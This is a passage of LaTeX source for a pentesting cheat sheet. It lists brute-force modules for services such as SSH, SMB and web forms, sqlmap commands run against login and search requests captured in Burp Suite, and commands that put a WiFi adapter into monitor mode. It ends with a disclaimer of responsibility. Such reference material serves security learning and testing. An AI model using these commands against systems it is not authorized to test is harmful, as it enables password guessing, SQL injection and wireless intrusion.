Brute force module for RLOGIN sessions \newline % Row Count 28 (+ 2) rsh.mod : Brute force module for RSH sessions 
\newline % Row Count 29 (+ 1)
smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions \newline % Row Count 31 (+ 2)
} \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{ smtp-vrfy.mod : Brute force module for verifying SMTP accounts (VRFY/EXPN/RCPT TO) \newline % Row Count 2 (+ 2)
smtp.mod : Brute force module for SMTP Authentication with TLS \newline % Row Count 4 (+ 2)
snmp.mod : Brute force module for SNMP Community Strings \newline % Row Count 6 (+ 2)
ssh.mod : Brute force module for SSH v2 sessions \newline % Row Count 8 (+ 2)
svn.mod : Brute force module for Subversion sessions \newline % Row Count 10 (+ 2)
telnet.mod : Brute force module for telnet sessions \newline % Row Count 12 (+ 2)
vmauthd.mod : Brute force module for the VMware Authentication Daemon \newline % Row Count 14 (+ 2)
vnc.mod : Brute force module for VNC sessions \newline % Row Count 15 (+ 1)
web-form.mod : Brute force module for web forms \newline % Row Count 17 (+ 2)
wrapper.mod : Generic Wrapper Module \newline % Row Count 18 (+ 1)
\seqsplit{===========================================================================================================================} \newline % Row Count 21 (+ 3)
SQLmap: \newline % Row Count 22 (+ 1)
sqlmap -r search.req -{}-batch -{}-force-ssl \newline % Row Count 23 (+ 1)
sqlmap -r login.req -{}-batch -{}-force-ssl \newline % Row Count 24 (+ 1)
- search.req = the search-bar request captured in Burp Suite Repeater and saved with 'Copy to File' \newline % Row Count 26 (+ 2)
- login.req = the login-form request captured in Burp Suite Repeater and saved with 'Copy to File' \newline % Row Count 28 (+ 2)
\seqsplit{=========================================================================================================================== } \newline % Row Count 
31 (+ 3) } \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{How to set a WiFi adapter in Monitor Mode: \newline % Row Count 1 (+ 1) ifconfig wlan0 down \newline % Row Count 2 (+ 1) iwconfig wlan0 mode monitor \newline % Row Count 3 (+ 1) ifconfig wlan0 up \newline % Row Count 4 (+ 1) or \newline % Row Count 5 (+ 1) airmon-ng check kill \newline % Row Count 6 (+ 1) airmon-ng start wlan0 \newline % Row Count 7 (+ 1) \seqsplit{===========================================================================================================================}% Row Count 10 (+ 3) } \tn \hhline{>{\arrayrulecolor{DarkBackground}}-} \SetRowColor{LightBackground} \mymulticolumn{1}{x{17.67cm}}{I'm not responsible for anything you do} \tn \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \end{document}